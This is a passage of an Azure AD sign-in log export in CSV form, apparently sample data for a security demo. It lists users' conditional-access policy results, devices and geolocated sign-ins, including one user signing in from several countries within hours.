'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5f11d930-41ca-43a7-b362-f3cee7610600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5f11d930-41ca-43a7-b362-f3cee7610600,SigninLogs,Sucess,28,3
+87,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:39.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9949e6d9-5fdf-40d2-aedf-4bb62be18865,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",669c457e-4441-4eab-88a8-07b7b8ff0700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,669c457e-4441-4eab-88a8-07b7b8ff0700,SigninLogs,Sucess,13,105
+88,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0720c351-7b47-43c5-a372-d233bbbd2a96,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Microsoft Flow Portal,6204c1d1-4712-4c46-a7d9-3ed63d992682,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:23,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3a3c86e-d6a1-4323-9bc0-1a2625f40600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Flow Service,d3a3c86e-d6a1-4323-9bc0-1a2625f40600,SigninLogs,Sucess,-20.54751015,-47.4056282
+89,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:57.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f43cafc3-d5d3-4b15-b383-53d9310fa46b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079e88b40d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99476ccd-67d1-454b-a7cf-079e88b40d00,SigninLogs,Sucess,41.90428925,-85.99833679
+90,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:11.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c583003d-5de2-43f7-84cf-33a1b0067af7,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3cec8880c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5f11d930-41ca-43a7-b362-f3cec8880c00,SigninLogs,Sucess,41.90428925,-85.99833679
+91,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:19.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:23,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'isCompliant': True, 'trustType': 'Azure AD joined', 'isManaged': True}",8ba905ce-4b13-4da4-aa67-e018e6b16100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8ba905ce-4b13-4da4-aa67-e018e6b16100,SigninLogs,Sucess,38.47222137,-77.41989899
+92,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:51.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",85789f99-3a4c-45a5-91bc-0194eaa90e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,85789f99-3a4c-45a5-91bc-0194eaa90e00,SigninLogs,Sucess,33.0175209,35.44601059
+93,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:11.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b43ba508-b40b-4ddc-a3ee-48492a3eceb5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-30334c5a0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5423bf62-9037-4448-bcaa-30334c5a0f00,SigninLogs,Sucess,33.7984581,-84.38828278
+94,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:26.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,89c7469f-d07d-0000-5683-4ecd601c91ac,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 